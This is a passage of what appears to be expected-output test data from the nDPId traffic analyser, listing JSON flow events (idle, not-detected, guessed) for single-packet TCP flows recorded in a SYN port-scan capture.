-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 